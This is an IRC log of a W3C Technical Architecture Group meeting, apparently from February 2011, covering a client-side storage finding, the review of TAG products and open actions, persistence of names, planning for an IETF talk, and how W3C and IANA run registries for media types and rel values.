makes sense 15:16:43 [ht] NM: On the separate vs. together point (storage vs. Privacy&Security) 15:16:54 [ht] ... indeed per JAR sometimes it's dangerous to factor 15:17:01 [ht] ... but not sure that's true here 15:17:28 [ht] NM: Suppose you did just focus on storage, w/o talking about P&S 15:17:36 [masinter] "Client side state" doesn't really have anything to say unless there is some 'memory' or 'communication' of client side state 15:18:01 [ht] NM: What would the Product page look like if you did that (thought experiment)? 15:18:19 [ht] ... If you can't even do that, we've learned something 15:18:54 [ht] ... And if you _can_, then we can look at the P&S factoring question as such 15:19:15 [masinter] q+ to explore a different perspective -- there are multiple design patterns in use in the community, some are better than others for several reasons... which are better, how are they evaluated, and what are 'best practices' 15:19:27 [ht] NM: Thinking about the Product page should be really helpful 15:19:41 [ht] AM: I want to come back to the "one large document" question 15:19:50 [ht] JAR: That's not what I said. . . 15:20:06 [ht] NM: If we want to do a large document, it's a long way out 15:20:32 [ht] ... So even if we are aiming for a merged form, the work has to go ahead as if it were going to stand on its own 15:21:01 [ht] LM: Different perspective -- we're not designing an implementation -- there are already a number of iimplemenrtations, and they differ 15:21:10 [noah] q? 15:21:12 [noah] ack next 15:21:13 [Zakim] masinter, you wanted to explore a different perspective -- there are multiple design patterns in use in the community, some are better than others for several reasons... which are 15:21:15 [Zakim] ... better, how are they evaluated, and what are 'best practices' 15:21:19 [ht] ... they have different relevant properties to the requirements 15:21:23 [noah] q+ to ask: what are the top 3 questions this finding will answer? 15:21:52 [ht] LM: Here are seven different impls, here are their properties, here's why some address req't X, Y, Z better/worse than others 15:22:04 [ht] s/impls,/design patterns/ 15:22:32 [masinter] "seven" plus or minus four 15:22:36 [ht] s/iimplemenrtations/design patterns for C-S S/ 15:23:11 [ht] NM: Assuming this is a separate document, what are the top three questions it will answer for the community? 15:23:17 [ht] AM: Give me three weeks 15:23:42 [ht] NM: OK, let's suspend judgement on the long-term future of this work until we see your response 15:24:30 [masinter] are there books or papers on web application design, that cover client side storage, use of cookies, local storage, etc? 15:24:30 [noah] . ACTION: Ashok (with help from Noah) build product page for client storage finding, identifying top questions to be answered 15:24:33 [ht] AM: We asked the WebApps guys who are writing these specs, where are your use cases? 15:24:44 [ht] AM: And they didn't have much of a concrete reply 15:25:18 [ht] [Scribe note: This was all re ] 15:26:26 [noah] ACTION: Ashok (with help from Noah) build good product page for client storage finding, identifying top questions to be answered on client side storage Due: 2011-03-01 15:26:26 [trackbot] Created ACTION-523 - (with help from Noah) build good product page for client storage finding, identifying top questions to be answered on client side storage Due: 2011-03-01 [on Ashok Malhotra - due 2011-02-17]. 15:27:29 [ht] [Break until 1045] 15:27:50 [Ashok] Ashok has joined #tagmem 15:28:08 [Ashok] rrsagent, pointer 15:28:08 [RRSAgent] See 15:28:32 [Ashok] rrsagent, make logs member visible 15:49:11 [ht] [resume from break] 15:50:03 [ht] Topic: Review of TAG activity 15:52:51 [ht] NM: I've been reviewing the open actions, to try to abstract what the set of Products are in principle 15:53:01 [ht] ... So that we can create the ones that are missing 15:53:54 [ht] NM: Quick scan of the Tracker Products: 2001/tag/group/track/products 15:55:40 [ht] NM: Agreed that we are _not_ currently working on the Versioning Product 15:55:41 [noah] ACTION: Noah close versioning product 15:55:41 [trackbot] Created ACTION-524 - Close versioning product [on Noah Mendelsohn - due 2011-02-17]. 15:56:14 [ht] LM: Some of that work is going forward under other headings, e.g. the mime info work 15:57:21 [ht] NM: What is this WebApp Access Control product? 15:57:25 [noah] ACTION: Noah to check with John before closing WebApps access control 15:57:25 [trackbot] Created ACTION-525 - Check with John before closing WebApps access control [on Noah Mendelsohn - due 2011-02-17]. 15:57:26 [ht] JR: Ask JK 15:58:49 [noah] ACTION: Noah to do first draft product stuff for MIME and related core web mechanisms 15:58:49 [trackbot] Created ACTION-526 - Do first draft product stuff for MIME and related core web mechanisms [on Noah Mendelsohn - due 2011-02-17]. 16:06:57 [ht] NM: We have a total of 45 open actions 16:10:49 [ht] LM: I want to push Action 519 to be even bigger, on the relation of standards to operational requirements 16:11:14 [ht] ... Big ISPs come to IETF, not to W3C, so this is important wrt our presentation to the IAB 16:12:42 [noah] ACTION: Noah to make sure we make progress on ACTION-519 and ACTION-517 in time to provide input to Prague IETF meeting, talk to be ready by mid-March 16:12:42 [trackbot] Created ACTION-527 - Make sure we make progress on ACTION-519 and ACTION-517 in time to provide input to Prague IETF meeting, talk to be ready by mid-March [on Noah Mendelsohn - due 2011-02-17]. 16:18:37 [ht] NM: Diving in to Action-521, do we want to press forward with taking Disposition of Names in a Namespace to REC: 4 not sure, 2 against, 1 to push it to Core, 0 to do it 16:19:02 [ht] NM: Remind NM to propose next steps and/or discussion on this 16:19:24 [masinter] masinter has joined #tagmem 16:20:08 [ht] NM: Relieved not to find too many "Oops, we've let this slip" responses or "Oops, there's a big iceberg under here" 16:21:41 [ht] NM: Open for discussion, let's propose edits to the list of Products 16:21:52 [ht] ... Additions or deletions 16:22:11 [ht] q+ to say Products don't exhaust our work 16:22:16 [jar] q+ jar to take apart 'important' 16:22:39 [noah] q_ 16:22:40 [noah] q- 16:22:42 [noah] ack next 16:22:43 [Zakim] ht, you wanted to say Products don't exhaust our work 16:22:51 [noah] ack next 16:22:51 [masinter] q+ to propose changing "HTML 5 review" to "HTML/CSS/etc. architecture" 16:22:52 [Zakim] jar, you wanted to take apart 'important' 16:22:59 [noah] ack next 16:23:00 [Zakim] masinter, you wanted to propose changing "HTML 5 review" to "HTML/CSS/etc. architecture" 16:23:39 [ht] LM: Change HTML 5 review to Open Web Platform Architecture 16:25:04 [ht] LM: At the AC, the MS rep [name?] proposed a number of HTML5-related arch. issues 16:25:26 [ht] ... and I've gotten a list from Julian Reschke 16:25:38 [masinter] and from several other people 16:25:42 [noah] q? 16:25:59 [masinter] s/the AC/the TPAC plenary/ 16:27:11 [ht] HST: Is Persistence a Product 16:27:47 [ht] NM: Should we be doing that -- think about where this stands? 16:27:49 [DKA] q+ to suggest a serious thing. 16:28:01 [masinter] I'm looking at 16:28:22 [ht] LM: I don't think it has a real place wrt fundamental arch. issues 16:28:25 [noah] q? 16:28:49 [masinter] s/has a real place/is one of the top priorities/ 16:29:01 [ht] TBL: We have responsible for long-term issues, which no-one else will worry about 16:29:07 [ht] s/have/are/ 16:29:59 [ht] s/wrt fundamental arch. issues/aligns with the guidance we're getting/ 16:30:30 [ht] NM: I read JJ's list as a "be sure to cover this", not "and nothing else" 16:30:49 [timbl] q+ to to say we can also contribute to Jeff's list 16:32:28 [ht] HST: We owe it to the people who raised the persistence question to work on it, and I think addressing why people don't trust 'http:' URIs is a fundamental arch. question. 16:32:43 [ht] NM: Goals and success criteria 16:33:30 [noah] HT: We have two draft documents in different stages: 1) my somewhat stale but valuable Dirk and Nadia design a naming scheme and 2) Jonathan's checklist document 16:33:52 [noah] HT: I think each of those speak to a different community, and suggest different deliverables directed at different goals. 16:34:10 [masinter] the reason why i'm reluctant to put this is a priority is that i'm afraid i have some real disagreements about the nature of the problem and the directions to address them. 16:34:15 [noah] HT: Potential goal #1: address the architectural origins of the vulnerability of Web names as 16:34:58 [plinss] s/names as/names./ 16:35:03 [noah] HT: Potential goal #2: identify best practices for the use of Web names in contexts where some form of persistence is goal. 16:36:31 [timbl] q+ to wonder about a goal in which social insititions are changed in order to acheive persistence. 16:37:07 [noah] ack next 16:37:09 [Zakim] DKA, you wanted to suggest a serious thing. 16:37:56 [noah] ACTION: Henry to create and get consensus on a product page and tracker product page for persistence of names Due: 2011-03-01 16:37:56 [trackbot] Created ACTION-528 - Create and get consensus on a product page and tracker product page for persistence of names Due: 2011-03-01 [on Henry S. Thompson - due 2011-02-17]. 16:38:12 [timbl] due date: 3011-01-01 -- test that the action URI still works 16:38:12 [noah] ACTION-528 Due 2011-03-01 16:38:12 [trackbot] ACTION-528 Create and get consensus on a product page and tracker product page for persistence of names Due: 2011-03-01 due date now 2011-03-01 16:38:37 [DKA] ack me 16:39:07 [masinter] "persistence" requires both technical and social institutions to coordinate. We should look at successful social institutions and those in trouble. 16:39:20 [ht] DKA: Offline web: widgets, app cache, cf. JJ's Web Apps and mobile devices bullet 16:39:38 [masinter] 16:39:57 [ht] DKA: There is a workshop being organized by Matt Womer in this area 16:40:09 [ht] NM: This overlaps with C-S S 16:40:20 [ht] DKA: This is about packaging 16:40:34 [ht] ... not (just) storage 16:40:53 [ht] NM: Should we discuss making this a product? 16:40:58 [ht] NM: OK, will do 16:42:02 [noah] ACTION: Noah to schedule telcon discussion of a potential TAG product relating to offline applications and packaged Web 16:42:02 [trackbot] Created ACTION-529 - Schedule telcon discussion of a potential TAG product relating to offline applications and packaged Web [on Noah Mendelsohn - due 2011-02-17]. 16:42:04 [ht] NM: All of mobile? 16:42:17 [ht] DKA: No, mobile and the offline web -- packaging the web 16:43:01 [Ashok] Interacts with Client-Side Storage 16:43:43 [ht] JAR: Saying something is important is not very useful, unless someone is signed up for it 16:44:46 [ht] ... Maybe we should do a gap analysis: a matrix where we have supply-side -- what would each member be inclined to do, left to themselves, vs. demand-side: what have JJ and/or our community asked us to do 16:44:55 [ht] ... and we look for the blank spaces 16:45:08 [masinter] q+ to talk about 'underlying architecture' as possibly a higher TAG priority than Jeff's list, which applies to W3C as a whole 16:45:11 [ht] JAR: And we don't yet have enough information yet to actually build that matrix 16:45:33 [ht] NM: That's a goal for us, yes 16:46:00 [masinter] alignment between W3C working groups, and with IETF and with previous specs and .... is after all what TAG was originally chartered for 16:46:05 [ht] zakim, close the queue 16:46:05 [Zakim] ok, ht, the speaker queue is closed 16:46:19 [masinter] q? 16:46:24 [masinter] ack masinter 16:46:24 [Zakim] masinter, you wanted to talk about 'underlying architecture' as possibly a higher TAG priority than Jeff's list, which applies to W3C as a whole 16:46:24 [ht] q- to 16:46:45 [noah] ack next 16:46:47 [Zakim] timbl, you wanted to wonder about a goal in which social insititions are changed in order to acheive persistence. 16:47:18 [noah] topic: IETF Meeting in Prague 16:47:24 [noah] Henry and Larry will be there. 16:47:27 [noah] AM: Talk or panel. 16:47:48 [noah] LM: See ACTION-500. There is a panel, with representation from lots of the IETF community. Panel description is copied in the action. 16:47:57 [ht] trackbot, action-500 16:47:57 [trackbot] Sorry, ht, I don't understand 'trackbot, action-500'. Please refer to for help 16:48:00 [ht] trackbot, action-500? 16:48:00 [trackbot] Sorry, ht, I don't understand 'trackbot, action-500?'. Please refer to for help 16:48:02 [noah] LM: Not yet determined between Henry and me who will actually be on the panel. 16:48:08 [noah] ACTION-500? 16:48:08 [trackbot] ACTION-500 -- Larry Masinter to coordinate about TAG participation in IETF/IAB panel at March 2011 IETF -- due 2011-02-15 -- OPEN 16:48:08 [trackbot] 16:48:22 [noah] AM: You probably only get 15 mins? 16:48:27 [noah] LM: At most, could be 10. 16:48:44 [noah] LM: We should use this mainly to "show the flag", indicate where major points of interest are, etc. 16:48:58 [noah] LM: They've written what they think the issue is for them. 16:49:20 [noah] HT: It's in some sense better we don't have a longer slot, which would lead to us reading our laundry list. 16:49:41 [noah] HT: The appropriate question we need to think of here today is, what do we want to project about the TAG itself? 16:49:50 [noah] q+ to ask about TAG vs. W3C 16:49:56 [noah] zakim, open the queue 16:49:56 [Zakim] ok, noah, the speaker queue is open 16:49:58 [noah] q+ to ask about TAG vs. W3C 16:50:39 [noah] LM: We are in the process of establishing our priorities based on what the community needs from us. Some people at the IETF meeting are likely to be, unfortunately, not W3C members. 16:51:37 [noah] NM: Um, our TAG community is the Web and Internet community, not just the W3C. 16:51:44 [noah] LM: Ooops, you're right, that's what I meant. 16:52:06 [noah] NM: We listen to everyone, on www-tag, by inviting people to join meetings and calls, etc. 16:52:24 [noah] HT: The IETF is appealingly a crypto-anarchist community with a long history. 16:52:49 [noah] HT: They are phenomenally successfully. 16:54:49 [noah] HT: Larry and I should probably send email to www-tag asking for input, then get telcon time. 16:55:02 [noah] LM: Henry, hows about you draft a talk for review, with my help? 16:55:16 [noah] HT: I'll produce say, 5 slides, for review on call in two weeks. 16:55:22 [masinter] what is the tag, waht the tag works on, what things are we thinking about in W3C, what things are we thinking about in the TAG in particular 16:56:03 [noah] ACTION: Henry to draft slides for IETF meeting, with help from Larry Due 2011-02-22 16:56:03 [trackbot] Created ACTION-530 - Draft slides for IETF meeting, with help from Larry Due 2011-02-22 [on Henry S. Thompson - due 2011-02-17]. 16:56:39 [ht] NM: Suspended for lunch 16:56:54 [ht] rrsagent, make logs public-visible 16:57:00 [ht] rrsagent, draft minutes 16:57:00 [RRSAgent] I have made the request to generate ht 17:09:35 [timbl] timbl has joined #tagmem 17:36:47 [ht] ht has joined #tagmem 17:41:35 [timbl_] timbl_ has joined #tagmem 18:04:14 [timbl] scribenick: timbl 18:04:19 [timbl] q? 18:04:46 [timbl] Phlippe Le Hégaret joins the meeting 18:05:09 [timbl] Discussion of action items 18:05:35 [timbl] NM: LArry asked my to add a link to RFC5226 to th agenda. 18:06:00 [noah] 18:06:21 [plh] plh has joined #tagmem 18:06:39 [noah] 18:06:40 [timbl] DQA: I note IE9 has Geolocation. 18:06:41 [masinter] there was another link 18:06:56 [timbl] Larry: 18:06:59 [timbl] re ACTION5111 18:07:10 [timbl] ... we have havd a lot of discussion of registries 18:07:22 [timbl] .. perhaps as reaction to IANA, feeling that regisries were 18:07:36 [timbl] ... a bottleneck in the system, that we should use URIs to be decentralized. 18:07:53 [noah] BTW: I can't see the queue when I'm projecting, so for now we won't use it. 18:07:54 [timbl] ... Still, there are protocols, protocol and langauge elements whre we don't use URIs. 18:08:13 [timbl] ... But, if it isn't a URI, then how do you find out what it means? 18:08:26 [plh] --> XPointer Registry 18:08:43 [timbl] ... DOes IANA still mange it? But IANA is unrespionsive and cumbersome? Should we se a wiki page, [html wg suggest] 18:09:06 [timbl] ... I was trying to frame the issue with MIME type registries. 18:09:13 [plh] --> Register an Internet Media Type for a W3C Spec 18:09:23 [timbl] ... Many issues are around what the mime type means when it eveolves, having to do with versioning. 18:09:54 [timbl] .... There ar technical and social issues. Power: who controls the resgisteryt? Who controls what properteis things hsould have registered? 18:10:07 [timbl] ... People disagree on the contents oo f the registry 18:10:39 [timbl] ... I pointed to RFC2434, now RFC52226 . 18:10:40 [timbl] . 18:10:41 [masinter] 18:11:08 [timbl] ... I also saw a goid IAN document in progress on extensability from the point of view of protocl design, in which registries are one way. 18:11:17 [timbl] s/oid/ood/ 18:11:31 [timbl] PLH: I pasted in various links, incluidng to the XPointer registry. 18:11:44 [timbl] ... This registry is hosted by W3C. 18:12:22 [masinter] css prefix organization names? 18:12:34 [timbl] HT: The spec didn't have unqualified names, but people companined that getting URIs in to bind every name was ridiculous. Please let us defined some short names whcih we can own, and we did, and so we have a URI-based registry mechanism. 18:12:51 [plh] 18:12:56 [timbl] .... the way you tell what short names mean or are available is you concatenate with a URI. 18:13:14 [timbl] PLH: This was very lightweight, lighteight review process too. 18:13:29 [timbl] ... We demand a link to a spec but no other review. 18:13:50 [timbl] HT: Just a way of mapoping short names into URI space on a firec come,first served basis. 18:14:10 [timbl] LM: What does CSS do with vendor prefixes? 18:14:26 [timbl] Peter: Nothing formal -- we have recently started keeping a list. 18:14:54 [noah] NM: Is it just a convention? 18:15:06 [timbl] ... You register just the -moz- not the -moz-* names. 18:15:27 [noah] PL: No, more than that. The spec requires a syntactic convention for use of anything that is either not in the spec, or not advanced to a certain point in the spec development. 18:15:53 [noah] TBL: Do you standardize thinks like -*-roundedcorner? 18:15:57 [noah] PL: No, just -*- 18:16:29 [timbl] TBL: As a CSS user, having many diff anmes was a pain for Roiunded Corners. 18:16:42 [timbl] Peter: That was necessary as the diff vendors did it differently. 18:17:13 [timbl] Larry: We were having registries, so we are not really folowing out URI architectuer. Can IANA be fixed? S the problem IANA? 18:17:26 [timbl] ... People say the problem is not IANA but tarcking what IANA is up do. 18:17:27 [plh] --> HTML ISSUE 27 18:17:47 [timbl] TbL: For example, the text/n3 mime type is still pending 18:17:51 [timbl] ... after years 18:18:24 [timbl] Larry: if you look at the docs establishing how IANA works, they don't determienthe process ... that is established each registry anew. 18:18:52 [timbl] I refined teh URI scheme ergistry process, there is still unhappiness with it. 18:19:07 [timbl] ... I would hope for WC to reivent this wheel and rediscover all the problems 18:19:19 [noah] s/hope for/hate for/ 18:19:29 [timbl] PLH: THis is related to infmaous HTML WG Issue 27 (see link above) 18:19:39 [timbl] ... (all HTML WG issues are infamous) 18:19:45 [noah] s/infmaous/infamous/ 18:20:17 [masinter] proposal W3C run rel: 18:20:20 [noah] s/determienthe/determine the/ 18:20:25 [timbl] PLH: One proposal is to have a registry at W3C 18:20:50 [masinter] 18:21:32 [timbl] ... Mark Nottingham has done work on a IANA registry. Ian Hixon tested it and declared that it was not working. 18:21:45 [timbl] ... there is a counterproposal whcih just uses a wiki page. 18:21:55 [timbl] ... This was escalated to the WG as issue 27. 18:22:17 [noah] 18:22:26 [noah] ISSUE 27: @rel value ownership, registry consideration 18:22:38 [timbl] Larry: We should discuss whether and why and how W3C runs registries -- it should not be decided just by a local WG, as it is a long term commitment, and much more than the design of a technical spec. 18:23:02 [timbl] PLH: Without requiremets, you can't 18:23:12 [masinter] image/svg+xml 18:23:19 [timbl] PLH: It took years to get image/svg+xml took years to get registerd. 18:23:28 [timbl] ... Evne though it was in use for years. 18:23:41 [plh] --> Approval of image/svg+xml Media Type 18:24:15 [plh] q? 18:24:26 [noah] q- 18:24:30 [timbl] Larry: People brought this up as a poster child fo why it didbn;'t work ... but they didn't in fct respond to IANA's commenbst about what was missing from the application 18:24:34 [timbl] q+ 18:24:46 [noah] ack next 18:25:21 [masinter] there's also been a long recent discussion about +json and +zip; and +xml is an issue 18:25:33 [noah] TBL: We had a story with text/n3+rdf type where we used the W3C/IETF liaison meeting to track. Per that discussion we removed the +rdf. 18:25:59 [noah] TBL: They said we would have to produce a stable document, which we did some years ago, so for me text/n3 is another poster child for the problems. 18:26:18 [plh] --> N3 18:26:48 [noah] TBL: The confusion is compounded because there are people out there using the now deprecated +rdf form, but there's nothing to point to saying, "here's what you should do". 18:26:53 [jar] q+ jar to mention journals e.g. PLoS One 18:27:10 [masinter] Maybe W3C should have an IANA shepherd who knows how to work IANA and helps people through the process, that would be better than running W3C registry.. 18:27:18 [plh] for n3, I'm probably the bottleneck 18:27:27 [noah] TBL: There's also no tracker for the application review process for mime types. You can't tell where things are in the process, what the problems are, or even that there is a registration pending. 18:27:49 [noah] TBL: So, one suggestion is that we should not only run a registry at W3C, but that we should run a tracker. 18:27:56 [noah] LM: You could run a tracker for IANA 18:28:23 [timbl] LM: The ITEF tools team has been building tools for IANA but not that one yet. 18:28:30 [noah] LM: The IETF the tools team has built tools for many groups, and perhaps has just not gotten to IANA 18:28:46 [timbl] PLH: The technical issues we ahve to resolev, and they can tajke years 18:29:14 [timbl] ... Teh chaset attribute, and then conte-encoding, the dscussions exhausted the energy of the applicants. 18:29:15 [timbl] q+ 18:29:50 [timbl] Larry: My experience has been very posistive: you tell the truth you get approval. With text/html Dan Connolly and I updated it... I also did application/pdf. 18:29:55 [plh] q+ 18:30:37 [timbl] ... I was involved gopher's mime types 18:31:25 [timbl] ... What can take years has been miscommunication. 18:32:32 [plh] --> MIME Type Review Request: image/svg+xml November 2044 18:32:33 [noah] TBL: I sypmath. 18:32:37 [plh] s/2044/2004/ 18:32:46 [noah] TBL: That now is the case, which is good. 18:33:21 [noah] TBL: Therefore, my view is that the right path for SVG would have been that all the stuff like charset should have been caught and fixed as part of the W3C CR process reviews. 18:33:29 [plh] q? 18:33:34 [noah] ack next 18:33:35 [Zakim] jar, you wanted to mention journals e.g. PLoS One 18:33:36 [timbl] q- 18:33:53 [timbl] jar: This is not happenin in a vacuum -- there ahve been ergistries before IANA 18:34:06 [timbl] ... It isn't jsyt who runs t, it is wjhat properties it has: 18:34:10 [noah] s/ahve/have/ 18:34:21 [noah] s/ergistries/registries/ 18:34:39 [timbl] ... Wjhat criteria fo acceptabnce, professionalizm of management, what tracking tec,... the publication of a scholarly journal is a analogous process, foo example. 18:35:49 [plh] s/jsyt/just/ 18:35:56 [plh] s/wjhat/what/ 18:36:26 [timbl] LarryL: We use registries for extensibility, where the spec points to a given specific registry, an dth standard defined the criterial for the registry, so that the standard will still work. If soemoen tries to register a term which violated the design, then it is rejected. 18:37:21 [masinter] maybe this is an important criteria for registries -- that the protocol design shouldn't rely on the registrar review to maintain invariants 18:38:18 [ht] q+ to ask what _is_ the problem at hand 18:38:59 [timbl] Tim: Example -- HTTP header s always as RFC822 headers have a comma -as an equivalent to a new header lne - the cokie header spec in error used it differently asnd it was not caught. 18:39:27 [timbl] Larry: The spec puts an onuns on the good peopel running the resitry to make sure that good things happen. 18:39:51 [noah] LM: In some cases in the past, the spec did not tightly bound what extensions could do, and we relied on the registrar to enforce good practice. 18:39:52 [noah] Hmm. I'm sure Larry is right about the history, but it seems preferable to me that the spec >should< say what extension points can do, and the the registrar merely enforce that 18:40:04 [noah] ack next 18:40:19 [timbl] PLH: We have a media type registry at W3C 18:40:42 [masinter] Register an Internet Media Type for a W3C Spec 18:41:16 [timbl] plh: Since M Duetsr left w3t, I have been maintainin the big table at the bottom 18:41:22 [timbl] ... This table has been there for 8 years 18:42:11 [timbl] ... The old way of registering a media type is to just write an RFC, but a few yeas aho, with Martin's help, IETF lallows other organization's specs to be used in the IANA oregistration. 18:42:14 [plh] --> Status of Internet Media type registrations 18:43:06 [noah] TBL: Is N3 in the table? 18:43:15 [noah] PHL: No, my fault. Kick me. 18:43:19 [noah] TBL: Will do. 18:43:24 [timbl] PLH: I accept total repsonsability for making sure that it is 18:43:51 [timbl] ... Many of these media tyeps are here but not un the IANA registry. 18:44:24 [timbl] Larry: How amny of these have been requested? 18:44:58 [timbl] PLH: If you look at the "Plans" column. 18:45:32 [timbl] I suggest that the states be defined in an ontolgyt 18:45:55 [timbl] PLH: "Need ietf types review" means that W3C has yet to ask for that review. 18:46:46 [timbl] [discussion fo W3C process] 18:47:04 [timbl] PLH: We have thsioe steps to help working groups go through those processe. 18:47:23 [timbl] ... We can end up with things which just hang there 18:47:31 [noah] q? 18:47:35 [noah] ack next 18:47:36 [Zakim] ht, you wanted to ask what _is_ the problem at hand 18:47:52 [timbl] HT: What is the problem we are trying to fix now? 18:48:20 [timbl] PLH: The problem with SVG was gteting is registered in 2010 after asking in 2004, with it being used in between. 18:48:31 [noah] PLH: For me the problem is that we requested an SVG media type in 2004, that only got formal approval in 2010, and it was used without registration for 6 years. 18:48:47 [noah] HT: OK, stipulate a problem with >that< registry, the TAG issue appears to be about issues in general. 18:49:35 [timbl] HT: Sounds like a bug in that registry -- lets suggest that they implement a tracker. That could be fixed. Automating the regisry wouldn't nevessarily help that. The Xpointer scheme registry has a rule that the URI works and tells you the status the oment you have requested it. 18:50:13 [timbl] Larry: It would be nice to give IANA a heads up before the request -- and intent to register. you coudl post that they intend to register it. 18:50:25 [noah] q? 18:50:28 [timbl] Tim: propose that hte IANA system shoudlb surface all the info in PLH's table 18:50:37 [masinter] 18:51:12 [masinter] but if OASIS and ISO and other organizations want to register values, shouldn't they also be visible to W3C members? 18:51:31 [ht] s/oment you have/moment you have requested, but that's a management decision, not a technical one/ 18:51:35 [timbl] q= to mention ontologies and schemas which we discussed before 18:52:40 [timbl] LArry: There is a place fro lightweight registries - -- ege MIME types many orgs can contribute to. 18:53:00 [timbl] q+ 18:53:28 [timbl] Larry: W3C should try to fix IANA befroe running around it. 18:54:16 [timbl] ... We should volunteer to help them, nd find a good way to imtegrate the web architecture of the registry with the Internet Architecture people. 18:55:09 [timbl] ... Specificaly tas technical details, here are issues about the MIME types conflicting with the sniffing documents. 18:55:18 [plh] q+ 18:55:54 [timbl] Noah: Do we want any more work on this? 18:56:23 [timbl] Larry: PLH is on the front line, who is being asked to run registries. As the TAG we can help out with arch issues. 18:56:39 [timbl] PLH: The immediate issue is issue 27, which is related to rel="" 18:56:52 [noah] Noah: to clarify, I was asking whether we needed to schedule or track work thats 18:56:58 [noah] that's beyond what we're already doing 18:57:06 [timbl] ... The enxt step if dor counter proposals in the HTML WG. 18:57:07 [noah] 18:57:31 [noah] PLH: Potentially, the TAG might have a position to offer to the HTML WG 18:57:49 [noah] TBL: I'm not sure I'm hearing anyone around the table complain about anything. 18:57:52 [timbl] JAR: There are RFCs which point t the IANA registries. 18:58:08 [timbl] q? 18:58:10 [masinter] 18:58:13 [noah] ack next 18:58:19 [noah] JAR: We don't want two registries. 18:58:20 [plh] q- 18:58:43 [noah] TBL: Right, not two registries, and we want a good relationship with IANA. We do need something that will produce RDF. 18:59:00 [noah] JAR: Um, that can be a tarpit. I've already tried to convince IETF on that. 19:00:16 [noah]. 19:00:57 [noah] TBL: IANA spent a long time working in plain text not HTML, a long time using ftp vs. http, they've slowly moved. I fear we might be talking a long time to make the move on conneg that returns RDF. 19:00:58 [masinter] I think people ascribe to "IANA" things that are really within their own control 19:01:24 [jar] well, not on exactly that, but on something closely related having to do with link relations and 200 status 19:01:24 [plh] --> Effects of a registry at W3C 19:01:28 [plh] q+ 19:01:40 [masinter] there's no reason why W3C can't run a service for doing something with IANA registered terms, for example, by adding to the registry a set of "registered value retrieval services" 19:01:49 [noah] TBL: Meanwhile, there are cases where you want to pick up information etc. about a new media type dynamically, while browsing. 19:02:04 [noah] NM: Trust issues aside, you could even dynamically pick up handlers, e.g. to render a new image type. 19:02:14 [noah] TBL: Indeed, a very interesting rathole, but not now. 19:02:20 [masinter] q+ to talk about getting a document on 'registry requirements and operations' that talks also about the scalability issues 19:02:39 [noah] ack next 19:03:09 [timbl] The relationship between a MIME type and a typical file extension si important fr dsecurity -- you must not store a fle in a file system so that it ooks as though it has a fifferent MIME type, as taht is a security hole. 19:03:43 [noah] ACTION-511? 19:03:43 [trackbot] ACTION-511 -- Larry Masinter to send email framing TAG work on registries -- due 2011-01-20 -- PENDINGREVIEW 19:03:43 [trackbot] 19:03:46 [timbl] PLH: Henry Sivonen suggets a very lightweight system for MIME types, with no real review. 19:04:09 [timbl] Larry: I think i hear enough technical and architectural issues and I am thinking of wroting a finding about it. 19:04:15 [plh] a/with no real review/similar to the XPointer registry/ 19:04:18 [noah] . ACTION: Larry to write draft finding on architectural good practice relating to registries 19:04:26 [plh] s/for MIME types/for re values/ 19:04:37 [noah] . ACTION: Larry to write draft document on architectural good practice relating to registries 19:05:01 [noah] s/good/issues and good/ 19:05:04 [timbl] .. Larry: I would like to write about arch. issues and god practices. 19:05:30 [noah] ACTION: Larry to write draft document on architectural good practice relating to registries Due 2011-04-19 19:05:30 [trackbot] Created ACTION-531 - Write draft document on architectural good practice relating to registries Due 2011-04-19 [on Larry Masinter - due 2011-02-17]. 19:07:30 [timbl] ---------------------------------------------- 19:07:49 [timbl] topic: Issue Tracking 19:08:11 [timbl] NM: What does "open" mean of an issue? 19:08:50 [timbl] ... For those we are not working on actively , we shopuld categorize them. 19:08:53 [plh] plh has left #tagmem 19:09:35 [timbl] ... We shoul close the ones whcih have been overtaken by events. 19:10:56 [noah] 19:11:04 [timbl] NM: re Issue-7 19:11:04 [noah] ISSUE-7: (1) GET should be encouraged, not deprecated, in XForms(2) How to handle safe queries (New POST-like method?GET plus a body?) 19:11:04 [trackbot] ISSUE-7 (1) GET should be encouraged, not deprecated, in XForms(2) How to handle safe queries (New POST-like method?GET plus a body?) notes added 19:11:10 [timbl] Is this still relevant? 19:11:32 [timbl] Larry PING atributes ping a server to show you took a link 19:11:49 [timbl] Larry: They are in the WHATWH spec still. 19:12:18 [timbl] ... but not in the W3C spec. 19:12:24 [noah] LM: We should worry about the W3C spec. 19:12:29 [timbl] Larry: This battle has been fought. 19:12:37 [masinter] s/They are/It might be/ 19:12:43 [masinter] s/WHATWH/WHATWG/ 19:13:00 [noah] NM: Disagree, at least in principal. If any organization is promoting widespread use of something we consider inappropriate, that's potentially of concern to the TAG. 19:13:06 [noah] TBL: Yes, but we have to pick our battles. 19:13:13 [noah] HT: What about the original XForms issue. 19:13:19 [timbl] HT: If XForms actually using GET when it should? Iand thsoe who use it, use POST not GET, and that is how XForms archietcture is designed to work. 19:13:33 [timbl] ... I didn't realzie there is a tension there. 19:13:42 [masinter] I defined MIME type multipart/form-data in 19:13:51 [timbl] ... But XForms uses POST just in order o have an XML body. 19:14:44 [timbl] Larry: Lets close this without predjudice. 19:15:03 [noah] TBL: Let's close it without prejudice 19:15:08 [noah] NM: Fine with me 19:15:35 [timbl] TrackBot, Close ISSUE-7 19:15:35 [trackbot] ISSUE-7 (1) GET should be encouraged, not deprecated, in XForms(2) How to handle safe queries (New POST-like method?GET plus a body?) closed 19:15:58 [noah] RESOLUTION: We will (re)close ISSUE-7, without prejudice with respect to HTML ping being good/bad 19:16:05 [noah] close ISSUE-7 19:16:05 [trackbot] ISSUE-7 (1) GET should be encouraged, not deprecated, in XForms(2) How to handle safe queries (New POST-like method?GET plus a body?) closed 19:16:37 [timbl] ----- 19:16:41 [noah] 19:16:44 [timbl] Issue-20: 19:16:44 [trackbot] ISSUE-20 What should specifications say about error handling? notes added 19:16:46 [noah] ISSUE-20: What should specifications say about error handling? 19:16:46 [trackbot] ISSUE-20 What should specifications say about error handling? notes added 19:17:17 [timbl] HT: If this is being pursued it would be in the XML HTML TF 19:17:28 [noah] Last status change was: connecting with "HTML 5 review" product a la 19:17:31 [timbl] HT: Propsoe this has been overtaken by ovents. 19:17:39 [noah] HT: I think this is overtaken or subsumed wrt/HTML. 19:17:50 [noah] LM: Those are specific instances, but there's a broader concern here. 19:18:02 [timbl] Larry: Thsoe are specific instances -- we have though a general st of conservative/liberal, error handling etc set fo concerns here. 19:18:26 [timbl] Larry: Like, if you dictatte whta happens exactly with every error, are they still errors? 19:18:49 [timbl] HT: On a cslae of 1..10, that concern is for me a 2 19:19:10 [timbl] ... in terms of its importance to the TAG. 19:19:24 